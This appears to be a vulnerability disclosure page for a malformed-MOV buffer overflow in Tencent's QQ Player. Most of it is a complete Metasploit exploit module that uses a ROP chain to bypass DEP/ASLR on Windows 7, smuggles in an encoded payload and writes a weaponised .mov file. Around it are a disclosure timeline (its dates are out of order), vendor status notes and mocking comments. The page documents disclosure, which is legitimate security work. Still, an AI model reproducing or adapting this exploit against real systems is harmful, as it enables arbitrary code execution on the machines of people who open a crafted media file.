2011-11-21: Details reported to the vendor; awaiting vendor handling
2011-11-21: Vendor confirmed; details disclosed to the vendor only
2011-11-24: Details opened to third-party security partners
2012-01-15: Details opened to core white hats and experts in related fields
2012-01-25: Details opened to regular white hats
2012-02-04: Details opened to intern white hats
2011-12-21: Details made public
The QQ Player core is an outdated version: when it processes a malformed MOV file, a buffer overflow occurs that lets an attacker overwrite the SEH record and execute arbitrary code. Truly worthy of the "king of knockoffs".
http://115.com/file/cl3naedv
http://115.com/file/aqu3qzmk
```ruby
# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845 (latest)
# Tested on: WIN7

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',
      'Description'    => %q{
          This module exploits a vulnerability in QQPLAYER Player 3.2.
          When opening a .mov file containing a specially crafted PnSize value,
          an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hellok', # special thanks to corelanc0d3r for 'mona'
        ],
      'References'     =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'              => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'          => 750,
          'BadChars'       => "", # Memcpy
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'    => 'True',
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7', { 'Ret' => 0x67664cde } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '11 21 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]),
      ], self.class)
  end

  def exploit
    # !mona rop
    rop_gadgets =
      [
        0x00418007, # POP ECX # RETN (QQPlayer.exe)
        0x12345678,
        0x67664CE4,
        0x01020304,
        0x10203040,
        0x22331122,
        0x23456789,
        0x00418007, # POP ECX # RETN (QQPlayer.exe)
        0x00a9c18c, # <- *&VirtualProtect()
        0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)
        #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)
        0x008cf099, # XCHG EAX,ESI # RETN
        0x6497aaad, # POP EBP # RETN (avformat-52.dll)
        0x100272bf, # ptr to 'call esp' (from i18nu.dll)
        0x005fc00b, # POP EBX # RETN (QQPlayer.exe)
        0x00000331, # <- change size to mark as executable if needed (-> ebx)
        0x00418007, # POP ECX # RETN (QQPlayer.exe)
        0x63d18000, # RW pointer (lpOldProtect) (-> ecx)
        0x63d05001, # POP EDI # RETN (avutil-49.dll)
        0x63d05002, # ROP NOP (-> edi)
        0x008bf00b, # POP EDX # RETN (QQPlayer.exe)
        0x00000040, # newProtect (0x40) (-> edx)
        0x00468800, # POP EAX # RETN (QQPlayer.exe)
        0x90909090, # NOPS (-> eax)
        0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)
        # rop chain generated by mona.py
        # note : this chain may not work out of the box
        # you may have to change order or fix some gadgets,
        # but it should give you a head start
      ].pack("V*")

    stackpivot = [target.ret].pack('L')

    buffer = rand_text_alpha_upper(90) # 2
    buffer << rop_gadgets
    buffer << payload.encoded
    junk = rand_text_alpha_upper(2306 - buffer.length)
    buffer << junk
    buffer << stackpivot
    buffer << rand_text_alpha_upper(3000) # 3000

    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov")
    fd = File.open(path, "rb")
    sploit = fd.read(fd.stat.size)
    fd.close

    sploit << buffer
    file_create(sploit)
  end
end
```
None
Severity: High
Vulnerability Rank: 20
Confirmed at: 2011-11-21 18:10
Thank you very much for your report; we are following up.
2011-11-22: In progress
2011-11-24: Fixed
Holy crap!
Holy cow
@Tencent has always been the king of knockoffs anyway
Does it have to be this funny?
That jab is hilarious
Truly the king of knockoffs.. hahaha
Awesome, badass stuff